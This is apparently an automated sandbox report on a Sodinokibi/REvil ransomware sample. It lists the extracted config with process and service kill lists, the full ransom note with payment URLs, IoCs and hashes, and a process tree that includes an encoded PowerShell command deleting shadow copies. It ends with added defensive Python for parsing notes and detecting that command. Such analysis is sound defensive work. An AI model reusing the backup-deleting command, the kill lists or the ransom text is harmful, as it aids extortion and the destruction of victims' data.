Analysis

  • max time kernel
    139s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    11-05-2024 15:53

General

  • Target

    355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe

  • Size

    204KB

  • MD5

    355e7899e9b1c032865ce0e2b98a257a

  • SHA1

    cb96abf6a6172feb9e95fb08981a44332cd06ea5

  • SHA256

    a207ef339a7b12a825bd9f5fc6349e6c1ec130dbcb48d663d0d1fc91a534aa0d

  • SHA512

    18bb8f91153fcac63881e189f0e40301f49b21018b66b6b560e80fd8b843c27610bf59bfbfb804cea98b07a32f4bc7cf31c562589307ba6f938531addc9e9d21

  • SSDEEP

    3072:sr85C3oFiWjmfb+HP+rnRfUqW1Am5T+8WCdHwJK3Bc:k934jmfCHWtUP1Am5T+LCNwE3G

Malware Config

Extracted

Family

sodinokibi

Botnet

19

Campaign

35

Decoy

latableacrepes-meaux.fr

deziplan.ru

citydogslife.com

karmeliterviertel.com

mundo-pieces-auto.fr

sveneulberg.de

avisioninthedesert.com

pureelements.nl

aidanpublishing.co.uk

gavelmasters.com

biblica.com

baita.ac

innovationgames-brabant.nl

production-stills.co.uk

xn--ziinoapte-6ld.ro

reygroup.pt

apogeeconseils.fr

kristianboennelykke.dk

andrealuchesi.it

efficiencyconsulting.es

Attributes
  • net

    true

  • pid

    19

  • prc

    winword

    encsvc

    steam

    tbirdconfig

    oracle

    sqbcoreservice

    mydesktopservice

    mspub

    ocautoupds

    wordpad

    ocssd

    firefoxconfig

    mysqld

    thebat

    excel

    isqlplussvc

    thunderbird

    mysqld_opt

    outlook

    visio

    onenote

    synctime

    agntsvc

    thebat64

    sqlservr

    dbsnmp

    msftesql

    mysqld_nt

    ocomm

    infopath

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. 
From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    35

  • svc

    vss

    veeam

    svc$

    memtas

    backup

    sql

    sophos

    mepocs

Extracted

Path

C:\Users\8zpm7q9169-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 8zpm7q9169. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2C13A27D21BA5AEF 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/2C13A27D21BA5AEF Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: 8Q+gJbPKQid258inKMP65fQxjSLAfC9hs8Hq7okle3iG/mzboSfRC3nz6r1Y84U1 0f37sXnxy3hAq3MoyV0zTJLB6oNOYRjHBFh3tEiYe7xst9EvlbHPmOUsG6h2ev54 KAUStI8rQXd/QjQde0qTvJ9ebFdPbbPM2DQJ5pgdhTmJT1Imo0mGyND6eSZc897x 6CNlxXbP6qiXAmPyqrVakGVsXAstX4LjUQRhOttYTQHhsxViE8YJuQpDlc190Prw tJnE1/yUAtMWEWswKGcPGMJQtlFhA5amWWxUivSFdlaXI6nh2ATP+PFQ3nvoFwoi ZJGypiTDhG1cpz5WfwqyXpmEmUmR3DcEAwGZbuRh7GQRvw+Bmk86xma1HkeSb7dF YVLMD4BjKYOAwMShDojktKnelif38YkW01wVBOOyJFclhIEIb85Y9igCXm/I8jit 8PMyIkIf28w+ZSJY0uRC4AiS/g1fVW4fRXXLmlYPs/Ar2xlf1nBkwruzQTLguGK6 unAfP6z6z4sKeIFOfDIGDmfA+DSkd/ASOloZePMi/+zTQ1EigMmV6CN8OwqnGGwb 0xdpR9rKpDpnEpFZiXz3Wdz1gRdyXs7Zf9a1qWT3CB30IemYUXt7O2cqogWOimYs +HHAix3egQXeCdrmFSahIbdsA2I1p2oZI9PuvAPB9gcqYrYKgEAidoHiePpU8Sk+ B5sxv4YXYywgz8/Min5oP8DNN8Wa7qtK9hhat53npw2P4EE4wOIN06CUewRlTUJS sw9UXohyhQLBaE/O5LRO1jGrdExHRnsUppJ6/y2ZEHPAzERjrGuCp2/Rjtf+MQgP hn/2kTLyxdgE2touDpt/BYZjQazn4lm9J2I2qFjw2qqvuQG2SdiEA2OBeNkMrA79 dEr1hJyDpzENApZw9QDW8S68/LT+W65ifFsuiQkWZka9HL9n3QudBQevUfrssQLn JkV6z+uYaisykx33Y3R7cRd43u4jP1t7ojBZBm4okDGUnqchbDf4NemhVkdILKk0 BK8TBKzWFlRMTqJ8tlO6Ahm0xCI5bXxqTWhpMmi8E0SRcZLwvzwDmhjM6OjmgfTu QOnNITXcJbfB2fp4UazMcZGHuxa1TCE3OHbmz+TSg7W/JHFOGd3M78MdGwUfKHZb txUmym5p0sN9vpHpBzyGvr3JgM6YKMildljL9u/ccdW+DE52Lw1jEbgCs1R0c4ak /ZV8gRl6Mo9BdlGg1GIicA== Extension name: 8zpm7q9169 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2C13A27D21BA5AEF

http://decryptor.top/2C13A27D21BA5AEF
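The config extracted above is what the sample consumes at run time: prc and svc are the process and service kill lists, and ransom_template is the note with {UID}, {KEY} and {EXT} filled in per victim. The note recovered from C:\Users\8zpm7q9169-readme.txt is that template with UID 2C13A27D21BA5AEF and extension 8zpm7q9169. The Python below is an added example, not code from the report or from the malware: it turns the template into a regex (repeated placeholders become backreferences, so a note whose two UIDs disagree is rejected) to pull UID, KEY and EXT out of a note found on disk, and it applies the kill lists to process images and service names. The NOTE_FRAGMENT is a constructed sample that keeps only the first two lines of the key from the report; the matching rules for the kill lists (exact match on the image base name without .exe for prc, case-insensitive substring for svc) are this example's assumptions, not something the report states.

```python
import re

# prc and svc lists copied from the report's "Malware Config" section.
PRC = {
    "winword", "encsvc", "steam", "tbirdconfig", "oracle", "sqbcoreservice",
    "mydesktopservice", "mspub", "ocautoupds", "wordpad", "ocssd", "firefoxconfig",
    "mysqld", "thebat", "excel", "isqlplussvc", "thunderbird", "mysqld_opt",
    "outlook", "visio", "onenote", "synctime", "agntsvc", "thebat64", "sqlservr",
    "dbsnmp", "msftesql", "mysqld_nt", "ocomm", "infopath",
}
SVC = ["vss", "veeam", "svc$", "memtas", "backup", "sql", "sophos", "mepocs"]

# Fragment of the ransom_template config value (placeholders are the malware's own).
TEMPLATE_FRAGMENT = (
    "b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd"
    ".onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use "
    "our secondary website. For this: a) Open your any browser (Chrome, Firefox, "
    "Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} "
    "Warning: secondary website can be blocked, thats why first variant much better "
    "and more available. When you open our website, put the following data in the "
    "input form: Key: {KEY} Extension name: {EXT}"
)

# Constructed sample: the matching passage of the extracted note, with only the
# first two (space-separated) lines of the key kept and the rest omitted.
NOTE_FRAGMENT = (
    "b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd"
    ".onion/2C13A27D21BA5AEF 2) If TOR blocked in your country, try to use VPN! But you can use "
    "our secondary website. For this: a) Open your any browser (Chrome, Firefox, "
    "Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/2C13A27D21BA5AEF "
    "Warning: secondary website can be blocked, thats why first variant much better "
    "and more available. When you open our website, put the following data in the "
    "input form: Key: 8Q+gJbPKQid258inKMP65fQxjSLAfC9hs8Hq7okle3iG/mzboSfRC3nz6r1Y84U1 "
    "0f37sXnxy3hAq3MoyV0zTJLB6oNOYRjHBFh3tEiYe7xst9EvlbHPmOUsG6h2ev54 "
    "Extension name: 8zpm7q9169 ---- !!! DANGER !!! DONT try to change files by yourself"
)

PLACEHOLDER = re.compile(r"\{([A-Z]+)\}")
# Per-field patterns (assumed shapes: hex UID, alphanumeric extension, free-form key).
FIELD_PATTERNS = {"UID": r"[0-9A-Fa-f]+", "EXT": r"[0-9a-z]+", "KEY": r".+?"}


def template_to_regex(template):
    """Compile a ransom template into a regex with one named group per placeholder.

    A placeholder that appears more than once becomes a backreference, so the
    note must carry the same value everywhere the template repeats it.
    """
    parts, seen, pos = [], set(), 0
    for m in PLACEHOLDER.finditer(template):
        parts.append(re.escape(template[pos:m.start()]))
        name = m.group(1)
        if name in seen:
            parts.append(f"(?P={name})")
        else:
            seen.add(name)
            parts.append(f"(?P<{name}>{FIELD_PATTERNS.get(name, '.+?')})")
        pos = m.end()
    parts.append(re.escape(template[pos:]))
    return re.compile("".join(parts), re.DOTALL)


def extract_fields(template, note):
    """Return {"UID": ..., "KEY": ..., "EXT": ...} from a note, or None if it does not fit."""
    m = template_to_regex(template).search(note)
    return m.groupdict() if m else None


def targeted_processes(image_names, prc=PRC):
    """Images whose base name (case-insensitive, .exe stripped) is on the prc list."""
    hits = []
    for image in image_names:
        base = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if base.endswith(".exe"):
            base = base[:-4]
        if base in prc:
            hits.append(image)
    return hits


def targeted_services(service_names, svc=SVC):
    """Services whose name contains any svc entry (assumed substring match; "sql" alone is no service name)."""
    return [s for s in service_names if any(k in s.lower() for k in svc)]


if __name__ == "__main__":
    print(extract_fields(TEMPLATE_FRAGMENT, NOTE_FRAGMENT))
    print(targeted_processes(["C:\\Windows\\explorer.exe", "sqlservr.exe", "OUTLOOK.EXE"]))
    print(targeted_services(["MSSQLSERVER", "VeeamBackupSvc", "wuauserv", "VSS"]))
```

The same template regex can be run over every *-readme.txt on an affected host to confirm all notes carry one UID and one extension, and the kill-list functions give a quick read of which backup, database and mail processes on a given machine would be stopped before encryption.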

Signatures

  • Detect Neshta payload 3 IoCs
  • Neshta

    Malware from the Neshta family infects other executable files in order to spread.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi/Revil sample 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system executable filetype association
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1276
    • C:\Users\Admin\AppData\Local\Temp\3582-490\355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe"
      2⤵
      • Executes dropped EXE
      • Enumerates connected drives
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1180
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1788
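The -e argument on the PID 2800 command line (spawned by the 3582-490 child, PID 2760) is base64 of a UTF-16LE string and decodes to Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}. That is the shadow-copy deletion behind the "Uses Volume Shadow Copy service COM API" signature and the vssvc.exe and wbem\unsecapp.exe processes in the tree. The Python below is an added example, not code from the report or from the sample: it decodes an encoded PowerShell command line and flags shadow-copy tampering in the result. The indicator names and the detection regexes are this example's own; the -e/-ec/-enc/-EncodedCommand spellings are the documented forms of the PowerShell switch.

```python
import base64
import re

# Command line of PID 2800 exactly as recorded in the report's process tree.
CMDLINE_2800 = (
    "powershell -e "
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3"
    "AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8A"
    "LgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# -EncodedCommand and its documented short forms, followed by the base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Example-defined indicators of shadow-copy destruction (names are this example's own).
SHADOW_COPY_PATTERNS = {
    "wmi_shadowcopy_delete": re.compile(r"win32_shadowcopy.*\.delete\s*\(", re.I | re.S),
    "vssadmin_delete_shadows": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "wmic_shadowcopy_delete": re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
}


def decode_encoded_command(cmdline):
    """Return the script behind 'powershell -e <base64>', or None if no encoded argument."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    # -EncodedCommand carries the script as base64 over UTF-16LE, not UTF-8.
    raw = base64.b64decode(m.group(1))
    return raw.decode("utf-16-le").rstrip("\x00")


def shadow_copy_tampering(script):
    """Sorted list of indicator names whose pattern matches the script text."""
    return sorted(name for name, pat in SHADOW_COPY_PATTERNS.items() if pat.search(script))


def analyse(cmdline):
    """Decode an encoded command if present, then run the indicators over the result."""
    script = decode_encoded_command(cmdline)
    if script is None:
        script = cmdline  # plain-text command line: scan it as-is
    return {"decoded": script, "indicators": shadow_copy_tampering(script)}


if __name__ == "__main__":
    print(analyse(CMDLINE_2800))
```

Run over process-creation telemetry (Sysmon event 1, Windows 4688 with command-line auditing), the decode step matters more than the regexes: the encoded form contains none of the strings a plain-text rule for vssadmin or wmic would look for, which is the reason the sample uses it.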

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe

      Filesize

      547KB

      MD5

      cf6c595d3e5e9667667af096762fd9c4

      SHA1

      9bb44da8d7f6457099cb56e4f7d1026963dce7ce

      SHA256

      593e60cc30ae0789448547195af77f550387f6648d45847ea244dd0dd7abf03d

      SHA512

      ff4f789df9e6a6d0fbe12b3250f951fcf11e857906c65e96a30bb46266e7e1180d6103a03db2f3764e0d1346b2de7afba8259ba080057e4a268e45e8654dfa80

    • C:\Users\8zpm7q9169-readme.txt

      Filesize

      6KB

      MD5

      88e98094d6810d998278c223804fae60

      SHA1

      a77b73deb393326056ccc08a6fd623120e4ea81b

      SHA256

      4ca03bc50b9462530d9986d635d4a31feb01d4228a37a8bc8d2dec5bd6d2a72b

      SHA512

      1247f0e0a9d6ccc62b4aef9f5187f0faed6dc0847b6ab06129a6f3a25fc9b384957935c259766a2a8a499d1972f347119a310963296361f4c4f2613bbbb65aed

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

      Filesize

      1KB

      MD5

      a266bb7dcc38a562631361bbf61dd11b

      SHA1

      3b1efd3a66ea28b16697394703a72ca340a05bd5

      SHA256

      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

      SHA512

      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

      Filesize

      242B

      MD5

      654e41a9b1b2ac28471bcecf993e02ba

      SHA1

      c8262775af3b5dba21d3eb21a68ee65b9ff34c06

      SHA256

      91d40104a75addcc5ab4ec7a9e56d59bfa65c03fe8548a495b6f5e3a4f23a866

      SHA512

      d9501bab37f6e599ec4591569031833db66de389988287ee7ed3f0ffb46c1b3779da62a085e61a19edb6c91b9c0c16dac02cce047f9950f448870841796aa2cb

    • C:\Users\Admin\AppData\Local\Temp\TarE832.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      194KB

      MD5

      99fce5dd2c89655ebedd333feb252557

      SHA1

      a0ecc0468cec5be5143a00dff062a6030790360f

      SHA256

      67a24ea5864a65b3eea1a5507dfce30f716b67ef56dfd461b0f224e793a70251

      SHA512

      a5090755b223fdad6988bd741acde716fc578cdf722c71b3550b08b652c6d0c476d488d27e720c9c7d6ec95eb1bb9c294d2ab4dfa08421b9774a61343abda202

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

      Filesize

      252KB

      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

    • \Users\Admin\AppData\Local\Temp\3582-490\355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe

      Filesize

      164KB

      MD5

      1eac0f4ac60cc30b6b448dc102fdf825

      SHA1

      149a8f379faaca8c79b00256584a9c9aa6bf0639

      SHA256

      26df34c6b83ece197977c432fbb033da55d117d3018df939adf5b0927fcec83a

      SHA512

      6f9e3b21cf74670a7fadcffea5aa55401014cb65d93949b42305b1142d67d58d01f35d2d5769730bb07437c5e8d36176df594192d5ea518c3e7519c770ee3aeb

    • memory/1276-563-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/1276-565-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/2800-91-0x00000000029F0000-0x00000000029F8000-memory.dmp

      Filesize

      32KB

    • memory/2800-90-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB